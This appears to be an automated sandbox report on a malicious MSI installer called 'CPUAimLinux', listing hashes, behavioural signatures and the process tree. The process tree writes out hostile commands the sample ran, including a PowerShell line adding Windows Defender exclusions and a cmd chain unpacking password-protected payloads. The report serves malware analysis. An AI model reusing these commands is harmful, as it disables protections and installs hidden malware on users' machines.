Analysis
-
max time kernel
141s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
19-11-2024 08:51
Static task
static1
Behavioral task
behavioral1
Sample
4037df6c0b60bb7d411ba6f760843830bcb80483713e6eb91db5b9c8b9f0711d.msi
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
4037df6c0b60bb7d411ba6f760843830bcb80483713e6eb91db5b9c8b9f0711d.msi
Resource
win10v2004-20241007-en
General
-
Target
4037df6c0b60bb7d411ba6f760843830bcb80483713e6eb91db5b9c8b9f0711d.msi
-
Size
27.1MB
-
MD5
756b1b81669fb5b5d745c83ced428cb1
-
SHA1
c573e1f1d32780c808db53e5fd5e571d617816e6
-
SHA256
4037df6c0b60bb7d411ba6f760843830bcb80483713e6eb91db5b9c8b9f0711d
-
SHA512
d9fd646383ff4fa82a920068b2141a94bd10424c5465040066d28be78be83ad730915b50bf1dfea9c2ed03b4a6b2287a19078a235a78aa835148a0381f5b00da
-
SSDEEP
786432:G3OL1MXJ/fZz/yft39ldEQk9EzbR8VP0wiVD8Kyt:iOL1MXJ3Zz/etDdEQfHm10LU
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2608 powershell.exe -
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\I: msiexec.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Drops file in Program Files directory 17 IoCs
description ioc Process File created C:\Program Files\CPUAimLinux\WhatsApp1.exe msiexec.exe File created C:\Program Files\CPUAimLinux\DRrFaPIBzOdg.exe fXlHSNCgjpwhjcbESorcUuElETFupI.exe File created C:\Program Files\CPUAimLinux\hHILqDIvDmMm.exe MsiExec.exe File created C:\Program Files\CPUAimLinux\hHILqDIvDmMm.vbs hHILqDIvDmMm.exe File created C:\Program Files\CPUAimLinux\VC_redist.x64.exe msiexec.exe File created C:\Program Files\CPUAimLinux\cuwtzNKpgpoaOTjpwbTJlaaZdnfuAX fXlHSNCgjpwhjcbESorcUuElETFupI.exe File opened for modification C:\Program Files\CPUAimLinux\2_hHILqDIvDmMm.exe fXlHSNCgjpwhjcbESorcUuElETFupI.exe File opened for modification C:\Program Files\CPUAimLinux\hHILqDIvDmMm fXlHSNCgjpwhjcbESorcUuElETFupI.exe File opened for modification C:\Program Files\CPUAimLinux\hHILqDIvDmMm.exe MsiExec.exe File created C:\Program Files\CPUAimLinux\fXlHSNCgjpwhjcbESorcUuElETFupI.exe msiexec.exe File created C:\Program Files\CPUAimLinux\sCoWxepalfWCObCLKnAyaHfPkmbWUL msiexec.exe File opened for modification C:\Program Files\CPUAimLinux\cuwtzNKpgpoaOTjpwbTJlaaZdnfuAX fXlHSNCgjpwhjcbESorcUuElETFupI.exe File created C:\Program Files\CPUAimLinux\2_hHILqDIvDmMm.exe fXlHSNCgjpwhjcbESorcUuElETFupI.exe File opened for modification C:\Program Files\CPUAimLinux\DRrFaPIBzOdg.exe fXlHSNCgjpwhjcbESorcUuElETFupI.exe File created C:\Program Files\CPUAimLinux\DRrFaPIBzOdg.xml fXlHSNCgjpwhjcbESorcUuElETFupI.exe File opened for modification C:\Program Files\CPUAimLinux\DRrFaPIBzOdg.xml fXlHSNCgjpwhjcbESorcUuElETFupI.exe File created C:\Program Files\CPUAimLinux\hHILqDIvDmMm fXlHSNCgjpwhjcbESorcUuElETFupI.exe -
Drops file in Windows directory 10 IoCs
description ioc Process File opened for modification C:\Windows\INF\setupapi.ev1 DrvInst.exe File created C:\Windows\Installer\f770b47.msi msiexec.exe File created C:\Windows\Installer\f770b48.ipi msiexec.exe File opened for modification C:\Windows\INF\setupapi.ev3 DrvInst.exe File opened for modification C:\Windows\INF\setupapi.dev.log DrvInst.exe File opened for modification C:\Windows\Installer\f770b47.msi msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Installer\MSICAE.tmp msiexec.exe File created C:\Windows\Installer\f770b4a.msi msiexec.exe File opened for modification C:\Windows\Installer\f770b48.ipi msiexec.exe -
Executes dropped EXE 4 IoCs
pid Process 1552 fXlHSNCgjpwhjcbESorcUuElETFupI.exe 304 fXlHSNCgjpwhjcbESorcUuElETFupI.exe 848 hHILqDIvDmMm.exe 1020 WhatsApp1.exe -
Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs
pid Process 1236 msiexec.exe -
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fXlHSNCgjpwhjcbESorcUuElETFupI.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fXlHSNCgjpwhjcbESorcUuElETFupI.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language hHILqDIvDmMm.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 1612 cmd.exe 1516 PING.EXE -
Kills process with taskkill 1 IoCs
pid Process 3024 taskkill.exe -
Modifies data under HKEY_USERS 48 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs DrvInst.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 3069283f603adb01 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates DrvInst.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E msiexec.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs DrvInst.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2E msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs DrvInst.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA DrvInst.exe -
Modifies registry class 22 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\81E1A12860514854ABF64A65117DF8A4\SourceList\Media\1 = ";" msiexec.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\81E1A12860514854ABF64A65117DF8A4\Clients = 3a0000000000 msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\81E1A12860514854ABF64A65117DF8A4 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\81E1A12860514854ABF64A65117DF8A4\ProductName = "CPUAimLinux" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\81E1A12860514854ABF64A65117DF8A4\Language = "1033" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\81E1A12860514854ABF64A65117DF8A4\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\81E1A12860514854ABF64A65117DF8A4\AdvertiseFlags = "388" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\81E1A12860514854ABF64A65117DF8A4\DeploymentFlags = "3" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\DB99463B25670384096A57D9C0EE62BE msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\81E1A12860514854ABF64A65117DF8A4\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\81E1A12860514854ABF64A65117DF8A4 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\81E1A12860514854ABF64A65117DF8A4\ProductFeature msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\81E1A12860514854ABF64A65117DF8A4\PackageCode = "C9E0E5BB8EB593F42ABE1AE58FB7B24A" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\81E1A12860514854ABF64A65117DF8A4\Version = "84344839" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\81E1A12860514854ABF64A65117DF8A4\Assignment = "1" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\81E1A12860514854ABF64A65117DF8A4\SourceList\PackageName = "4037df6c0b60bb7d411ba6f760843830bcb80483713e6eb91db5b9c8b9f0711d.msi" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\81E1A12860514854ABF64A65117DF8A4\SourceList\Net msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\81E1A12860514854ABF64A65117DF8A4\SourceList\Media msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\81E1A12860514854ABF64A65117DF8A4\InstanceType = "0" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\81E1A12860514854ABF64A65117DF8A4\AuthorizedLUAApp = "0" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\DB99463B25670384096A57D9C0EE62BE\81E1A12860514854ABF64A65117DF8A4 msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\81E1A12860514854ABF64A65117DF8A4\SourceList msiexec.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1516 PING.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 2 IoCs
pid Process 1552 fXlHSNCgjpwhjcbESorcUuElETFupI.exe 304 fXlHSNCgjpwhjcbESorcUuElETFupI.exe -
Suspicious behavior: EnumeratesProcesses 53 IoCs
pid Process 332 msiexec.exe 332 msiexec.exe 2608 powershell.exe 848 hHILqDIvDmMm.exe 848 hHILqDIvDmMm.exe 848 hHILqDIvDmMm.exe 848 hHILqDIvDmMm.exe 848 hHILqDIvDmMm.exe 848 hHILqDIvDmMm.exe 848 hHILqDIvDmMm.exe 848 hHILqDIvDmMm.exe 848 hHILqDIvDmMm.exe 848 hHILqDIvDmMm.exe 848 hHILqDIvDmMm.exe 848 hHILqDIvDmMm.exe 848 hHILqDIvDmMm.exe 848 hHILqDIvDmMm.exe 848 hHILqDIvDmMm.exe 848 hHILqDIvDmMm.exe 848 hHILqDIvDmMm.exe 848 hHILqDIvDmMm.exe 848 hHILqDIvDmMm.exe 848 hHILqDIvDmMm.exe 848 hHILqDIvDmMm.exe 848 hHILqDIvDmMm.exe 848 hHILqDIvDmMm.exe 848 hHILqDIvDmMm.exe 848 hHILqDIvDmMm.exe 848 hHILqDIvDmMm.exe 848 hHILqDIvDmMm.exe 848 hHILqDIvDmMm.exe 848 hHILqDIvDmMm.exe 848 hHILqDIvDmMm.exe 848 hHILqDIvDmMm.exe 848 hHILqDIvDmMm.exe 848 hHILqDIvDmMm.exe 848 hHILqDIvDmMm.exe 848 hHILqDIvDmMm.exe 848 hHILqDIvDmMm.exe 848 hHILqDIvDmMm.exe 848 hHILqDIvDmMm.exe 848 hHILqDIvDmMm.exe 848 hHILqDIvDmMm.exe 848 hHILqDIvDmMm.exe 848 hHILqDIvDmMm.exe 848 hHILqDIvDmMm.exe 848 hHILqDIvDmMm.exe 848 hHILqDIvDmMm.exe 848 hHILqDIvDmMm.exe 848 hHILqDIvDmMm.exe 848 hHILqDIvDmMm.exe 848 hHILqDIvDmMm.exe 848 hHILqDIvDmMm.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 1236 msiexec.exe Token: SeIncreaseQuotaPrivilege 1236 msiexec.exe Token: SeRestorePrivilege 332 msiexec.exe Token: SeTakeOwnershipPrivilege 332 msiexec.exe Token: SeSecurityPrivilege 332 msiexec.exe Token: SeCreateTokenPrivilege 1236 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 1236 msiexec.exe Token: SeLockMemoryPrivilege 1236 msiexec.exe Token: SeIncreaseQuotaPrivilege 1236 msiexec.exe Token: SeMachineAccountPrivilege 1236 msiexec.exe Token: SeTcbPrivilege 1236 msiexec.exe Token: SeSecurityPrivilege 1236 msiexec.exe Token: SeTakeOwnershipPrivilege 1236 msiexec.exe Token: SeLoadDriverPrivilege 1236 msiexec.exe Token: SeSystemProfilePrivilege 1236 msiexec.exe Token: SeSystemtimePrivilege 1236 msiexec.exe Token: SeProfSingleProcessPrivilege 1236 msiexec.exe Token: SeIncBasePriorityPrivilege 1236 msiexec.exe Token: SeCreatePagefilePrivilege 1236 msiexec.exe Token: SeCreatePermanentPrivilege 1236 msiexec.exe Token: SeBackupPrivilege 1236 msiexec.exe Token: SeRestorePrivilege 1236 msiexec.exe Token: SeShutdownPrivilege 1236 msiexec.exe Token: SeDebugPrivilege 1236 msiexec.exe Token: SeAuditPrivilege 1236 msiexec.exe Token: SeSystemEnvironmentPrivilege 1236 msiexec.exe Token: SeChangeNotifyPrivilege 1236 msiexec.exe Token: SeRemoteShutdownPrivilege 1236 msiexec.exe Token: SeUndockPrivilege 1236 msiexec.exe Token: SeSyncAgentPrivilege 1236 msiexec.exe Token: SeEnableDelegationPrivilege 1236 msiexec.exe Token: SeManageVolumePrivilege 1236 msiexec.exe Token: SeImpersonatePrivilege 1236 msiexec.exe Token: SeCreateGlobalPrivilege 1236 msiexec.exe Token: SeBackupPrivilege 2336 vssvc.exe Token: SeRestorePrivilege 2336 vssvc.exe Token: SeAuditPrivilege 2336 vssvc.exe Token: SeBackupPrivilege 332 msiexec.exe Token: SeRestorePrivilege 332 msiexec.exe Token: SeRestorePrivilege 2712 DrvInst.exe Token: SeRestorePrivilege 2712 DrvInst.exe Token: SeRestorePrivilege 2712 DrvInst.exe Token: SeRestorePrivilege 2712 DrvInst.exe Token: SeRestorePrivilege 2712 DrvInst.exe Token: SeRestorePrivilege 2712 DrvInst.exe Token: SeRestorePrivilege 2712 DrvInst.exe Token: SeLoadDriverPrivilege 2712 DrvInst.exe Token: SeLoadDriverPrivilege 2712 DrvInst.exe Token: SeLoadDriverPrivilege 2712 DrvInst.exe Token: SeRestorePrivilege 332 msiexec.exe Token: SeTakeOwnershipPrivilege 332 msiexec.exe Token: SeRestorePrivilege 332 msiexec.exe Token: SeTakeOwnershipPrivilege 332 msiexec.exe Token: SeRestorePrivilege 332 msiexec.exe Token: SeTakeOwnershipPrivilege 332 msiexec.exe Token: SeDebugPrivilege 2608 powershell.exe Token: SeRestorePrivilege 1552 fXlHSNCgjpwhjcbESorcUuElETFupI.exe Token: 35 1552 fXlHSNCgjpwhjcbESorcUuElETFupI.exe Token: SeSecurityPrivilege 1552 fXlHSNCgjpwhjcbESorcUuElETFupI.exe Token: SeSecurityPrivilege 1552 fXlHSNCgjpwhjcbESorcUuElETFupI.exe Token: SeRestorePrivilege 304 fXlHSNCgjpwhjcbESorcUuElETFupI.exe Token: 35 304 fXlHSNCgjpwhjcbESorcUuElETFupI.exe Token: SeSecurityPrivilege 304 fXlHSNCgjpwhjcbESorcUuElETFupI.exe Token: SeSecurityPrivilege 304 fXlHSNCgjpwhjcbESorcUuElETFupI.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 1236 msiexec.exe -
Suspicious use of WriteProcessMemory 35 IoCs
description pid Process procid_target PID 332 wrote to memory of 1520 332 msiexec.exe 35 PID 332 wrote to memory of 1520 332 msiexec.exe 35 PID 332 wrote to memory of 1520 332 msiexec.exe 35 PID 332 wrote to memory of 1520 332 msiexec.exe 35 PID 332 wrote to memory of 1520 332 msiexec.exe 35 PID 1520 wrote to memory of 2608 1520 MsiExec.exe 37 PID 1520 wrote to memory of 2608 1520 MsiExec.exe 37 PID 1520 wrote to memory of 2608 1520 MsiExec.exe 37 PID 1520 wrote to memory of 1612 1520 MsiExec.exe 39 PID 1520 wrote to memory of 1612 1520 MsiExec.exe 39 PID 1520 wrote to memory of 1612 1520 MsiExec.exe 39 PID 1612 wrote to memory of 1552 1612 cmd.exe 41 PID 1612 wrote to memory of 1552 1612 cmd.exe 41 PID 1612 wrote to memory of 1552 1612 cmd.exe 41 PID 1612 wrote to memory of 1552 1612 cmd.exe 41 PID 1612 wrote to memory of 1516 1612 cmd.exe 42 PID 1612 wrote to memory of 1516 1612 cmd.exe 42 PID 1612 wrote to memory of 1516 1612 cmd.exe 42 PID 1612 wrote to memory of 304 1612 cmd.exe 44 PID 1612 wrote to memory of 304 1612 cmd.exe 44 PID 1612 wrote to memory of 304 1612 cmd.exe 44 PID 1612 wrote to memory of 304 1612 cmd.exe 44 PID 1520 wrote to memory of 848 1520 MsiExec.exe 46 PID 1520 wrote to memory of 848 1520 MsiExec.exe 46 PID 1520 wrote to memory of 848 1520 MsiExec.exe 46 PID 1520 wrote to memory of 848 1520 MsiExec.exe 46 PID 1520 wrote to memory of 1020 1520 MsiExec.exe 47 PID 1520 wrote to memory of 1020 1520 MsiExec.exe 47 PID 1520 wrote to memory of 1020 1520 MsiExec.exe 47 PID 1520 wrote to memory of 3024 1520 MsiExec.exe 48 PID 1520 wrote to memory of 3024 1520 MsiExec.exe 48 PID 1520 wrote to memory of 3024 1520 MsiExec.exe 48 PID 1020 wrote to memory of 3000 1020 WhatsApp1.exe 51 PID 1020 wrote to memory of 3000 1020 WhatsApp1.exe 51 PID 1020 wrote to memory of 3000 1020 WhatsApp1.exe 51 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\system32\msiexec.exemsiexec.exe /I C:\Users\Admin\AppData\Local\Temp\4037df6c0b60bb7d411ba6f760843830bcb80483713e6eb91db5b9c8b9f0711d.msi1⤵
- Enumerates connected drives
- Event Triggered Execution: Installer Packages
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1236
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:332 -
C:\Windows\system32\MsiExec.exeC:\Windows\system32\MsiExec.exe -Embedding 7DC72E46DDD054285256FC31F8F424C0 M Global\MSI00002⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1520 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\CPUAimLinux','C:\Program Files','C:\Program Files'3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2608
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start /min "" "C:\Program Files\CPUAimLinux\fXlHSNCgjpwhjcbESorcUuElETFupI.exe" x "C:\Program Files\CPUAimLinux\sCoWxepalfWCObCLKnAyaHfPkmbWUL" -o"C:\Program Files\CPUAimLinux\" -p"08136{%Qmb0Mr~q{WXZU" -y & ping 127.0.0.1 -n 2 & start /min "" "C:\Program Files\CPUAimLinux\fXlHSNCgjpwhjcbESorcUuElETFupI.exe" x "C:\Program Files\CPUAimLinux\cuwtzNKpgpoaOTjpwbTJlaaZdnfuAX" -x!"1_hHILqDIvDmMm.exe" -x!"sss" -x!"1_bEUAxCisQyQxhNlIqgtfrSfaocnxud.exe" -x!"1_" -x!"1_" -x!"sa" -o"C:\Program Files\CPUAimLinux\" -p"86225)AYVohjF3DD0{k[" -y3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:1612 -
C:\Program Files\CPUAimLinux\fXlHSNCgjpwhjcbESorcUuElETFupI.exe"C:\Program Files\CPUAimLinux\fXlHSNCgjpwhjcbESorcUuElETFupI.exe" x "C:\Program Files\CPUAimLinux\sCoWxepalfWCObCLKnAyaHfPkmbWUL" -o"C:\Program Files\CPUAimLinux\" -p"08136{%Qmb0Mr~q{WXZU" -y4⤵
- Drops file in Program Files directory
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of AdjustPrivilegeToken
PID:1552
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 24⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1516
-
-
C:\Program Files\CPUAimLinux\fXlHSNCgjpwhjcbESorcUuElETFupI.exe"C:\Program Files\CPUAimLinux\fXlHSNCgjpwhjcbESorcUuElETFupI.exe" x "C:\Program Files\CPUAimLinux\cuwtzNKpgpoaOTjpwbTJlaaZdnfuAX" -x!"1_hHILqDIvDmMm.exe" -x!"sss" -x!"1_bEUAxCisQyQxhNlIqgtfrSfaocnxud.exe" -x!"1_" -x!"1_" -x!"sa" -o"C:\Program Files\CPUAimLinux\" -p"86225)AYVohjF3DD0{k[" -y4⤵
- Drops file in Program Files directory
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of AdjustPrivilegeToken
PID:304
-
-
-
C:\Program Files\CPUAimLinux\hHILqDIvDmMm.exe"C:\Program Files\CPUAimLinux\hHILqDIvDmMm.exe" -number 169 -file file3 -mode mode33⤵
- Drops file in Program Files directory
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:848
-
-
C:\Program Files\CPUAimLinux\WhatsApp1.exe"C:\Program Files\CPUAimLinux\WhatsApp1.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1020 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1020 -s 6324⤵PID:3000
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /F /IM msiexec.exe3⤵
- Kills process with taskkill
PID:3024
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2336
-
